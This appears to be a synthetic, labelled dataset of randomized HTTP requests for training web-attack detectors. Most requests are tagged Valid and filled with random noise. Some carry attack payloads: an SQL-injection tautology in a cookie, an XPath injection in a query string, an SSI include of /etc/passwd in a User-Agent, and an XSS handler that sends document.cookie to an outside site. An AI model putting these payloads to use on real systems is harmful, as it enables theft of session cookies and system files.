Authorization: Basic ODBVYTpycnRiYQ==
Range: 609-
Referer: /ieesUrt/aedr.asmx
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: oacencpadr (rEgs5TcV6)
UA-CPU: MIPS
UA-Disp: 461,871,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0696x1408
Via: 2.6 1.116.253.158, HTTP/3.8 www.epxaNoh.html:625
Transfer-Encoding: deflate
Upgrade: lig/4.2, roeri/4.4
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 180.11.72.245
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38422
Start - Id: 20753
class: Valid
GET /auidndobejhe/ug9ab/b2un/cODVOpSy.-Wd/ahksdifdo/WaOvDRnKINxBHAG/qzei0sW9lix/dw/u1iframe3A.oSQ/e3LzLxoRa_tGBUQWhFMw/dosuotoysdE/1Rdocumenth2catQkt.cgi? HTTP/1.0
Host: 0.153.211.42
Connection: hseo
Accept: */*;q=0.2
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: etcct8-po24aj;q=0.7, cEfdir-pam2d
Cache-Control: max-age=3
Client-ip: 111.163.73.24
Cookie: oeezwhrker=618607621;s9execvbscripthtaccesRhSVhMI=eu
Cookie2: $Version="82"
Date: Thu, 02 Apr 09 05:57:46 GMT
ETag: W/"32r7hQgjXnRa3zv"
Expect: sbcoa
From: txeT@aevntoegn.com
If-Modified-Since: Fri, 18 Jul 08 08:37:37 UTC
If-Unmodified-Since: Sat, 14 Apr 07 11:32:55 CET
If-Match: "u0oxVMzCuc@vaytia_c"
If-None-Match: *
If-Range: Wed, 10 Sep 08 14:00:24 GMT
Max-Forwards: 5
MIME-Version: 6.1
Pragma: srehutym=6
Proxy-Authorization: opwp oxtsr=sist
Authorization: Basic cmFlaDpkb0Vhbm1uUw==
Range: 802086-,4327-
Referer: http://eluUNt.it/cieocn/7fo69tre.mpeg
TE: deflate,trailers
Trailer: Expect
User-Agent: Mozilla/5.3 (Windows; U; Win 9x 7.7; tn-ys; rv:6.8.3) Gecko/69343347
UA-CPU: StrongARM
UA-Disp: 2316,870,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 2236x546
Via: HTTP/3.6 www.l2enu.js, FTP/7.5 222.82.165.165:5561
Transfer-Encoding: identity
Upgrade: on4No/1.1, ethsR/6.5, yReop/0.2, in9/6.6, japnn/5.3
Warning: 220 www.htxyn.js:56846 "tipspynata3kBht" "Tue, 15 Sep 09 04:06:34 CET"
X-Forwarded-For: 148.116.239.129
X-Serial-Number: 716222532954
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 20753
Start - Id: 41305
class: SqlInjection
GET /tb5shxuttuec3EyaIee/aH6KRZXXYAO/fiQOdmLNUN9SVhw1.dll?elthanmqqi0=%3AdrF+locationnlo&ndaegeIh=67&tvxa1YcCstd2e=+3yte&fvewy=2709633&nun8otsw=3&enidnNntod1Eon=Hlu&r5re=seabootbuNbt&lvihn=y8theni&_-nph-tmphttpsgj.=hc-6&oeerepay=eliA%29l&a4iceBt=li4tOtaynel HTTP/1.0
Host: 117.75.14.100:2565
Connection: keep-alive
Accept: text/html, text/*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: noitin9g-e0ofe, bE37hio-hetQW;q=0.3, i-n4cn;q=0.3, 46k-seNnbeed, d-xrf;q=0.5
Cache-Control: no-store
Client-ip: 163.36.54.41
Cookie: -S4_='   OR   'iip'  <     'X;se=21vtfeEe;so6DRk1k=eeA\c;sreueeTx=386603
Cookie2: $Version="6"
Date: Sat, 08 May 04 12:08:50 CET
ETag: W/"I1QaKCxklWDlSXVw"
Expect: 100-continue
From: syaw2n@lrei.com
If-Modified-Since: Mon, 21 Apr 08 05:03:34 UTC
If-Unmodified-Since: Fri, 22 Oct 04 13:30:12 CET
If-Match: *
If-None-Match: "okUQTbEI33Ovo7nEhW"
If-Range: *
Max-Forwards: 2953
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic bHJ1c3JlOmFjaG04ZXJ0
Authorization: Digest username="7umcsJ"
Range: 536989-,435785-66,662-
Referer: /seae.asmx
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.3 (Machintosh; U; PPC Mac OS X 5.6; 0e-hs; rv:2.8.8) Gecko/72789489
UA-CPU: 68000
UA-Disp: 094,842,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 470x0638
Via: 8.0 www.8nmc.png, oudhe/1.2 151.119.209.82, 7.3 149.187.202.92:3194
Transfer-Encoding: deflate
Upgrade: socrc/1.5, hIo/9.2
Warning: 387 186.147.86.32 "h3ea5eriueh" 
X-Forwarded-For: 5.238.202.67
X-Serial-Number: 670048221
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41305
Start - Id: 24522
class: Valid
GET /eReCSJqDk.6/2nS4ax3/mfKwpjD7/iYd/Edasans4/l-.mUh-M/driteX/iRfmEF_Klm/u7/kW4wQOZ-x6smzl5@nosd/Tgatoekeplybw5aHo/ZhavingmailXL3Klsiinclude-.cgi? HTTP/1.1
Host: 167.141.53.59
Connection: close
Accept: audio/*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 106.138.49.194
Cookie: ndep56drsc=ifrom7;ewn=dweohps:h8
Cookie2: $Version="2"
Date: Fri, 22 Jun 07 15:20:15 CET
ETag: W/"Kqx9G5NvBbO08w6p_ak"
Expect: 100-continue
From: pzwu7iEa@yhivtK.st
If-Modified-Since: Sat, 05 Jul 08 19:04:22 GMT
If-Unmodified-Since: Wed, 02 Dec 09 09:20:55 GMT
If-Match: *
If-None-Match: *
If-Range: "qtr-yURl_hTfIL7baM"
Max-Forwards: 717
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic ZXNTZmFhOmVvaWZkb3M=
Authorization: Basic YmNPaGdDajowYXNld3Q=
Range: -85539,4-,9083-
Referer: /9olcs/vspl/dNpen.jpg
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/7.1 (Windows; U; Win 9x 3.4; hr-os; rv:9.7.4) Gecko/67422055
UA-CPU: PowerPC
UA-Disp: 1408,616,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 303x667
Via: 4.1 www.dUfonb.jpg, 2.6 47.93.101.96, 4.2 240.1.44.60:8663
Transfer-Encoding: gzip
Upgrade: 5hgvq/9.4, 91hai/8.8, sHfHh/0.9, aooIe/4.6
Warning: 566 www.Xphrezsp.htm "njtsn" "Sat, 25 Mar 06 03:51:16 UTC"
X-Forwarded-For: 150.103.175.246
X-Serial-Number: 185732331097779
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24522
Start - Id: 7600
class: Valid
PUT /Bsbp4W/gr2H80@qCXb/rdlolueeesoosuEytra/gsULJ1k.dll? HTTP/1.1
Content-Length: 268
Content-Language: aR3idr,o
Content-Encoding: compress
Content-MD5: bm1oV2VyTnJ4dEFlb29ocg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 02 Jan 10 11:38:58 CET
Last-Modified: Wed, 05 Aug 09 16:53:56 UTC
Host: www.uatAo.gov
Connection: 4tol5rEm
Accept: video/quicktime, image/gif
Accept-Charset: *;q=0.2
Accept-Encoding: compress
Accept-Language: IceisA-xe;q=0.3, jnewzHtl-Oswdea;q=0.4, cAtho0h-ln, xtl1lCpu-gha;q=0.5
Cache-Control: only-if-cached
Cookie: W8X=2duelonerdetkh1m8;yiSeeuaIae=n0b eafe;aezkDfs4Xoom7E=easmliwoOn;nreplaceLmUZDxr=mijfN;Yf0NJ9rTYPk=Rlt)ia==u&sg Osperl;8Kdhxlvyscript=orwgety
Date: Tue, 13 Feb 07 02:39:36 CET
ETag: W/"0PHdY2@zRCRHtFUv4"
Expect: fI5lqf=emdr
If-Modified-Since: Mon, 15 May 06 15:13:53 CET
If-Match: *
If-None-Match: *
If-Range: "VeSezr3mi2vhJGDfVa"
MIME-Version: 9.5
Pragma: no-cache
Authorization: Basic bGF0ZXVhOmk5NGFsRWV6
Range: 4990-,-42306,415-
Referer: http://jons9.it/wemlrgs/hpmk.bin
TE: gzip,trailers
User-Agent: Mozilla/5.4 (Windows; U; Windows NT 9.4; wa-xn; rv:8.0.5) Gecko/65060195
UA-Color: color32
Via: HTTP/5.8 www.snwmie1k.png:4
Transfer-Encoding: e7h8; h2hSei=t35edir2
Upgrade: rOmVn/8.0
X-Forwarded-For: 223.150.236.173
----: -----------------------

kd3stdin5JbV=m1y&feo1tvttE5seds=dnxMonstyle&sEhcrb2snoAph=354452&3darhTkaahq=c ttec7&tweu32w=5&teSlecplhd=tOOeG&eF2toElEtsT=wo&fFufdaooe=shutdownerahsnEi&qCgdhit6a=eoQDXyud_&.uyB=co&2nyhtifot=ye@6ecGeWog&4tasfrzae=Eenrl&sst4re1euta=et&dmie3mceddm=9617898417&a5=sgck6

End - Id: 7600
Start - Id: 25075
class: Valid
GET /ncfnziggrles5i/n1et87efvhisnlwN/ne/oO5Mbh2Wca9f20DmhEx/.GGj9IcHs@FK/iaR1gOpc/tiS7hkS-/KV4hivvY/Ewes/fateF1W79y.dll?Eoe3e6g2asvTd=5654618&rQir=i%28&orte7Ggiuenmcp=i%26oiousr&8bso=uasi09m+Vdttdocumentr HTTP/1.0
Host: www.dnio6iC5.cz:5717
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: euc-cn;q=0.7, macintosh, euc-cn;q=0.4, x-mac-roman
Accept-Encoding: deflate, deflate, compress;q=0.1, identity;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 182.187.50.102
Cookie: JicjhavingllM=2617860;rdutQe9bue=4
Cookie2: $Version="222"
Date: Sat, 29 Apr 06 09:07:58 UTC
ETag: "If@G4rojk@vGsF@9qb"
Expect: 100-continue
From: Nas7ogcn@zotni.st
If-Modified-Since: Tue, 05 May 09 16:01:36 GMT
If-Unmodified-Since: Wed, 24 Jan 07 10:37:39 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 08 May 07 08:44:39 CET
Max-Forwards: 2
MIME-Version: 1.6
Pragma: ia7ox=t
Proxy-Authorization: NTLM b3NqaXEydG9qaW13bGVlaWU2cWhpbWlyZGlMaTZ0Z2F0dw==
Authorization: Basic dGl1YUk6dWVnbg==
Range: -76678,-91938
Referer: /lm6nmre/etet0o.cfm
TE: gzip,gzip;q=0.2
Trailer: Transfer-Encoding
User-Agent: Negi/2.3
UA-CPU: StrongARM
UA-Disp: 0466,0106,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6866x078
Via: kotta/2.0 www.l12uhd1q.jpg, or0mi/3.6 157.197.145.241, HTTP/3.8 www.dryaces.shtml
Transfer-Encoding: gzip
Upgrade: oxLt/4.8, eoiRg/1.3, tetp3B/2.6
Warning: 069 254.171.0.195 "tteepahhCi0" 
X-Forwarded-For: 6.112.100.122
X-Serial-Number: 21941
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25075
Start - Id: 10428
class: Valid
GET /lyEZlavnPde.js?ym4hg2=se&1oqchabiyinh=Sih%3CN&d0nNsN=r&nyineegs=10&euit=l&U0XJ=I6nowdnwIwxe&tgu=pee7eg&ao5s=mailyyhtseartopenia%3F4aperlpasswdb HTTP/1.0
Host: www.tbNox2llos.fr:78778
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-1;q=0.6
Accept-Encoding: gzip, gzip, gzip
Accept-Language: *
Cache-Control: Weca2='eti0tn'
Client-ip: 158.159.219.167
Cookie: oaiqs3e05remtc=yGFX4@D;haeskc=ghe.ap;dnalpo9ai=32
Cookie2: $Version="88"
Date: Sun, 29 Jun 08 01:50:50 UTC
ETag: W/"FVLYSQKK5MeFEHqdbB6"
Expect: 100-continue
From: Lliy5dod@Ctlbdod.com
If-Modified-Since: Wed, 20 May 09 22:35:42 CET
If-Unmodified-Since: Wed, 22 Feb 06 07:39:16 CET
If-Match: *
If-None-Match: "WAkrGt9-wpzDukvL"
If-Range: "J2zItZvnPa.QfKY9"
Max-Forwards: 643
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Basic YmR2d3M1clQ6bTlycw==
Authorization: t6aeI aarorc=aimr9bmn
Range: 5-355295,61313-1,05930-37268
Referer: /smpsoad6/94Npaqah/pqetoe/ehaf/maae.tiff
TE: chunked,chunked;q=0.3
Trailer: Accept-Language
User-Agent: ibOsOubi/5.0.9
UA-CPU: StrongARM
UA-Disp: 1729,6694,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 679x5357
Via: 1.2 www.ri0egNno.jpeg:4897, HTTP/0.2 243.42.129.9
Transfer-Encoding: 5itc
Upgrade: hfsjm/5.3
Warning: 281 www.ro2salxO.css:58 "iwbhu" "Sat, 21 Jun 08 08:29:13 CET"
X-Forwarded-For: 152.133.229.225
X-Serial-Number: 664473
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 10428
Start - Id: 35794
class: XPathInjection
GET /jGh/zC36nrlw.jpg?IeTiisZ1tFpy=m%3F&0nlxir=0&Mtsdt0tnrio=4ir%2FljmNs%2Fi%2Fchild%3A%3Anode%28%29%5B+position%28%29%3D35%5D++%7C+++ohpenq%2Fx2isgA%2Ffnhgro%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D966%5D++++or++%27lzhvsce%27+++%3D%27&XNeval0=gubl4b+euawdt&B.2nxwherey5access_log=O&Odq9poBeNtL5so=Ot%27cvNao1tEichb&eraynky=netcate&kcGee=33&Id6d=60102 HTTP/1.0
Host: www.uTcaU.fr
Connection: ombTdn7n
Accept: */*;q=0.7
Accept-Charset: x-mac-turkish;q=0.9, x-mac-greek;q=0.8, x-mac-chinesesimp;q=0.7, iso-8859-1;q=0.0, windows-1253;q=0.1
Accept-Encoding: 
Accept-Language: bb-bsioobea, e1ztar-eHrkr0;q=0.1
Cache-Control: only-if-cached
Client-ip: 111.27.1.64
Cookie: 4ZaaQ=33577516;uellh=Ie~
Cookie2: $Version="0"
Date: Tue, 10 Aug 04 11:44:18 GMT
ETag: "BC6ce8C_dnKt4s0Z."
Expect: eenre=cursi6
From: OElnRjE@esgnh6.net
If-Modified-Since: Tue, 23 Jun 09 05:54:12 UTC
If-Unmodified-Since: Sun, 08 Jan 06 10:17:12 UTC
If-Match: *
If-None-Match: *
If-Range: "TD6isthNtm7jY26y"
Max-Forwards: 27
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest username="eahAd"
Referer: http://tdkel.biz/etiz5e/didtenza/yihunnre/irahKa.wav
TE: trailers,trailers
Trailer: Expect
User-Agent: 2JC7mYI http://www.y2si7z.st
UA-OS: WinNT
UA-Pixels: 4135x5853
Via: 1bNUer/1.3 245.161.192.158, 8.2 www.dolma.gif, ual/3.0 6.114.3.31
Transfer-Encoding: identity
Upgrade: n2smtz/0.7
Warning: 463 52.135.104.34 "le3vso" 
X-Forwarded-For: 104.169.156.2
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35794
Start - Id: 28491
class: Valid
GET /eTaWw9Xu/dp@UnJDvselectOy4tmpnL/cfeb/srnrtnrtrf41n4iimdty/tngdemhArd2Neacn6I.jpeg?tn2yisee=agroup+byfth&y5UX=%3Cafroml+1oas%7C4n&btnutsyi7=8291220&8ect9ra=e1Vj&l0=Tnhttp%7Ejo+tm1%27&cteitr6oqt=alPp_5nC7X&anojotapbeo=285494 HTTP/1.1
Host: 18.219.111.82
Connection: hselWiim
Accept: */*;q=0.8
Accept-Charset: utf-7;q=0.6, windows-1252, iso-8859-3, euc-cn;q=0.9
Accept-Encoding: gzip;q=0.9, identity
Accept-Language: 3e-qg;q=0.3, mqhh-her
Cache-Control: roho='oftao'
Client-ip: 229.55.227.78
Cookie: adrm6ets=lAAdoTDNukO;nrean=as3tnnjc;en2s=ban;FyxBcpasswdJstdinhavingA=rBCS-ZHnGlH
Cookie2: $Version="794"
Date: Sun, 18 Jun 06 07:15:14 CET
ETag: "Wk4KQloP1FWKrsVUXgTm"
Expect: 100-continue
From: eSaii@Beribes6hy.fr
If-Modified-Since: Fri, 11 Jan 08 06:40:22 UTC
If-Unmodified-Since: Thu, 29 Apr 10 01:28:35 UTC
If-Match: "1@5fSMP-AwJXg6RLgYrY"
If-None-Match: "9aVQ.Q19klv1cnDX0qp"
If-Range: *
Max-Forwards: 277
MIME-Version: 1.7
Pragma: enahe='oricoe'
Proxy-Authorization: et2e taNgj=ss0tnse
Authorization: NTLM b3BtaGluc2ltYXM1ZXJlY3RoZ2lyZGhpb2llczlhcnBxb3JwZWxkZXVz
Range: -6,2-
Referer: http://www.neibc.it/nityIA.jpg
TE: gzip;q=0.5
Trailer: Connection
User-Agent: 3IFt46 http://www.o0eErnn.uk
UA-CPU: x86
UA-Disp: 2714,6071,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 116x668
Via: dhceHo/2.1 162.169.250.198, HTTP/8.8 www.ghoys.tiff, u7wR/7.9 www.6ksonnss.png
Transfer-Encoding: compress
Upgrade: t5rg/1.6
Warning: 107 www.iwhhs.shtml "74siedtii" 
X-Forwarded-For: 243.229.193.59
X-Serial-Number: 5388761859689646
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 28491
Start - Id: 39838
class: SSI
POST /lErap/pCe/aD/57wzbl4nSi1deoTEL/aOilaimr/n7TJDJYVKLkEQEI1Ed/faewiAhrlrsip0s/aa/a0EsbEle/2ea8seskoal6wiin.jpeg? HTTP/1.0
Content-Length: 178
Content-Language: f,p
Content-Encoding: compress
Content-MD5: MWtTdGRXNnRuZW9lcm9lZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 08 Feb 09 11:45:32 GMT
Host: www.Hter.gov
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: compress
Accept-Language: sslEI-rta;q=0.4
Cache-Control: no-store
Cookie: hs4ee=moo;rtderisss1=bDTeWL90;oZ5dStsmoua=h9n;sala=Hke26ttrc2ecTadest;wgetyexec3ie1Ixw=fwre5 )eobject;eEhefdow=isedutcbs3dpuo
Cookie2: $Version="6"
Date: Mon, 06 Aug 07 18:35:38 UTC
Expect: 100-continue
If-Unmodified-Since: Thu, 10 May 07 12:09:43 GMT
If-Match: "0GVQueIJ48YV3v4g"
If-None-Match: *
If-Range: Sat, 09 Jan 10 01:29:21 UTC
Max-Forwards: 6
Authorization: Basic czBlcng6VWlzdG5jZFI=
Referer: http://www.as6n.ch/aigr1n/irFlei/eawre/hrioeCiw.pdf
User-Agent: <!--  #include  virtual="/etc/passwd"  -->
UA-Color: color32
UA-Pixels: 769x5437
Transfer-Encoding: compress
----: -------------------------------------------

TIlqt4s1ee8E4=10000560&odfozoosnoct=coPm i-htv~a&zEsorh=2otngd@aoEdlpidchild 3&dtgjXnapstoeIwK=316&udiaotay=81&pfNsasnr7lSttih=noszD5Nx&at=893761&vo2Q6nqswmdiso5=isL2VLv5@v

End - Id: 39838
Start - Id: 15910
class: Valid
GET /osSlefePmOmdso/ooqz/bweh0SWfd252-TSy/ayattwsab3vbUuitti/edLblA/sLnxXVGwPaV29HTJnXh/e3jJpaCYOy09/8_jkPwnj-Or/rA2Z47gO./03eodOeqn.msf?o4anrw4s7xwci=wt+g&7cnenEeefbje=nkv.ueC&wn4a93hoibd=28255351&uHenrtf7aE=csruwgthse&irhAyn=8%266%24laseg%3D&5at=tjtltietbdt&5tItzhx=hEsnsrdreTsmean&tut=iNuA-FJ&Fqobjectc=TueIdeLrk43h&k7KN6=etx%5Cntg9nnwti+mH9lsu&diLf1drnrePwdn=eqipl%3Etrdnsc HTTP/1.1
Host: www.vuedn.org
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: baoeoz-cua, a-ooyamwsm;q=0.3
Cache-Control: no-cache
Client-ip: 12.135.89.242
Cookie: tZte=40;DFHd1Zo=f2Iv5UEgHg6j
Cookie2: $Version="8"
Date: Fri, 20 Jan 06 07:36:15 CET
ETag: "tk-.QLr.a-duJ04A"
Expect: 100-continue
From: p3cchen@etaH.uk
If-Modified-Since: Tue, 07 Mar 06 06:35:38 CET
If-Unmodified-Since: Tue, 11 Sep 07 18:15:52 UTC
If-Match: "I8nvZw6IF0DaXRHC5L"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 2.7
Pragma: a=ehrsjele
Proxy-Authorization: Basic bzNsdzppc2xo
Authorization: Basic bEFycG9nZDpTbHRLdW9l
Range: 24232-,-81,-37455
Referer: /veinl/1atr/zjsurof/aroanlu.pdf
TE: trailers,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: yKeLFamT/8.2.8.4.3
UA-CPU: x86
UA-Disp: 1586,328,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 723x196
Via: 4.3 103.238.13.59
Transfer-Encoding: ndtet8
Upgrade: auc/1.8
Warning: 168 www.pbkslL.tiff "cad37ddmsf" "Thu, 31 Jan 08 09:57:52 UTC"
X-Forwarded-For: 185.247.30.17
X-Serial-Number: 721965
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15910
Start - Id: 47129
class: XSS
GET /-diZYZ2REQ7/RmflscYsystemTc@lo0/B0KEymYY_nIu/nG0CqIe4/nhyjtA3Aett/Metgtihryna/V.ff/gfknro7oohosSt/tdlbl.aspx?ceudeNxtdt7d2d=%3Cimg+src+++%3D++++%22++ni+%3E+%22++++onmouseover%3D%22+++++%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.rise.com%2Fcgi-bin%2Flaatic.cgi%27%2Bdocument.cookie%29%3B%5D++%22++%3E&Kqs6wd=lnrd3%7Cryn+eo&ecihuaturu=ibso8vfoL&ldTirn54lts=ealtoJl&wihu2=pViUYvgwa HTTP/1.0
Host: www.ouhda.biz:6510
Connection: eAmett
Accept: text/xml
Accept-Charset: us-ascii, cp-950, big5
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-stale
Client-ip: 130.149.173.192
Cookie: c4feIaxp4=utae~;lsao=tHxIj
Cookie2: $Version="7"
Date: Tue, 25 Jan 05 19:14:32 CET
ETag: "mQNu2WqrXNJIUGh7"
Expect: 100-continue
From: dy0mird@eelb.it
If-Modified-Since: Sat, 25 Jun 05 11:49:31 GMT
If-Unmodified-Since: Sun, 11 Mar 07 24:11:22 UTC
If-Match: *
If-None-Match: *
If-Range: "pkvVXtr2O-4U7WTH"
Max-Forwards: 46
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic b2hIdzRpYXM6U3FxYzdUMw==
Range: -63707,310050-133
Referer: /aouetasg/ccotaeii/8gtthtT/rwmdu/zaipoeo.js
TE: gzip
Trailer: Accept
User-Agent: eoaa/7.7
UA-CPU: 68000
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7372x166
Via: 3.4 121.10.1.78, fncc/4.0 56.96.91.18:704, FTP/7.3 86.72.132.212
Transfer-Encoding: gzip
Upgrade: eixwry/2.2, nei/4.2, gHU/2.1
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 42655
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47129
Start - Id: 5110
class: Valid
PUT /phnjum2xTaesed/iKGG_7h_ZladRB@M/cZk9.Gvi.lyc8qFyS/4e2ZU_tXPFybgsoundlikej/k9/e0C/rXfzUwHvuY1U/ooho/ol.js? HTTP/1.1
Content-Length: 59
Content-Language: as,t
Content-Encoding: compress
Content-Location: http://www.onnhOm.be/tmDan/hEnnpuH/mrNyh.php
Content-MD5: ZTJwY29nbnRnY3NFZVI0ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 18 Feb 08 10:57:38 UTC
Last-Modified: Mon, 28 Sep 09 18:58:33 GMT
Host: www.rurowseyj.it:80
Connection: close
Accept: */*
Accept-Charset: cp-936;q=0.8, euc-tw, cp-932;q=0.6, x-mac-ce;q=0.2, windows-1253
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.6
Cache-Control: min-fresh=45
Client-ip: 52.206.72.216
Cookie: tusgsel=n he(
Cookie2: $Version="0"
Date: Wed, 10 Nov 04 03:55:18 CET
ETag: W/"2V-KxhqfF-7SYME-Ti"
Expect: 100-continue
From: kIews1@lmencl.cz
If-Modified-Since: Mon, 28 Jun 04 13:42:14 UTC
If-Unmodified-Since: Fri, 20 Apr 07 10:24:46 UTC
If-Match: "GJBJG_ZMDbRxmKO"
If-None-Match: *
If-Range: Sat, 27 May 06 20:23:38 CET
Max-Forwards: 1483
MIME-Version: 8.8
Pragma: gir=lttihHat
Proxy-Authorization: kaatod qtRK=eaIhe
Authorization: Basic cGR3ZTphc3VsM2c=
Range: 5-,68-,3690-
Referer: http://3lto.fr/9eietr/easn.tiff
TE: deflate,chunked;q=0.8,trailers
Trailer: Accept-Language
User-Agent: Mozilla/7.9 (compatible; intp; Solaris; lraoa; rrgrpN)
UA-CPU: MIPS
UA-Disp: 4888,9411,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8123x7960
Via: HTTP/5.2 133.178.95.55, 8.4 www.euufara3.htm:53616
Transfer-Encoding: compress
Upgrade: UlFer/3.1, nef/4.3, lhKe/4.9
Warning: 045 www.glqe.js "r3y4amdOaIhbislattz" "Sun, 09 Apr 06 01:43:43 CET"
X-Forwarded-For: 248.188.122.40
X-Serial-Number: 21059
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lasncagcyspai=xi03select1ientrph&at4tUer=fzw&o7htuu=8572578

End - Id: 5110
Start - Id: 32339
class: Valid
GET /ycnIcxrmta/n.52_phiVPpPUFH/1PVnKcmd0W_delete7CRq-/Otou9t0utb/et9hCakof5/ense9inxte.css? HTTP/1.1
Host: 80.37.187.159
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 44.81.83.243
Cookie: ois=ofIWSlSwbxb;ye8inetts=38;SyaA=8moenrv3auaostf3s
Cookie2: $Version="91"
Date: Wed, 12 Oct 05 16:55:41 GMT
ETag: "7wBQ58KJo_lePfJqRvb"
Expect: 100-continue
From: E8ie@bbNE.biz
If-Modified-Since: Wed, 09 Jun 04 07:57:41 UTC
If-Unmodified-Since: Wed, 18 Aug 04 24:03:16 UTC
If-Match: "rWIR_9YjajiyrWhz5VA"
If-None-Match: "mMitNRp3Pz237K5"
If-Range: Fri, 22 May 09 11:12:23 CET
Max-Forwards: 7
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic TjBsMjJlOklhc21oc3V3
Authorization: Bwyef tdskxe7=auot
Range: -604
Referer: /txOa/oaeeo/Bmtint/yTDtfjt.msf
TE: deflate,gzip
Trailer: Via
User-Agent: S3on (bdsV9mS1; ii0rbHbgd; rKyz8ObVlI; o9ADY5)
UA-CPU: Sparc
UA-Disp: 5576,9149,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 831x847
Via: 1.1 www.a8Scopro.gif:52015
Transfer-Encoding: gzip
Upgrade: eai0N0/8.3
Warning: 268 73.155.225.55 "tujat7tN1dsia" "Fri, 08 Oct 04 18:08:34 CET"
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 5125463883
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32339
Start - Id: 22693
class: Valid
GET /inorcawvttdhv0/ngezahoeyJu/wuMXvGGmtQkQl-sZ_j/rarevlpolmts5cast/rYjsufamnwrilont9/f79rl8/ah88jYxp_l.sh? HTTP/1.0
Host: 82.234.146.79
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 170.118.70.133
Cookie: 7hn4=jle tr9ebse
Cookie2: $Version="4"
Date: Thu, 26 Jul 07 22:07:50 GMT
ETag: "7w4H6wWgRTm61cR5I2oz"
Expect: 100-continue
From: ohhR@ti5t.uk
If-Modified-Since: Mon, 27 Sep 04 19:22:34 CET
If-Unmodified-Since: Thu, 11 Aug 05 16:21:16 UTC
If-Match: "eBqKwTkGynatcud"
If-None-Match: "19L0B.3m1JVhaWY7K"
If-Range: Wed, 14 Oct 09 23:14:03 CET
Max-Forwards: 44
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="fi2ns"
Authorization: TwDoei a4ph=abtpf
Range: 949380-3,49-
Referer: /natsikwI.jpg
TE: deflate,deflate;q=0.6,trailers
Trailer: Max-Forwards
User-Agent: k4J6LzoH http://www.adc7tfeh.fr
UA-CPU: x86
UA-Disp: 1998,0662,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0084x738
Via: 8.2 www.tcstonv.jpeg
Transfer-Encoding: c2Isd; a9ar=L7ep
Upgrade: 1echoa/9.2, m3ak/1.2, iermmo/3.2
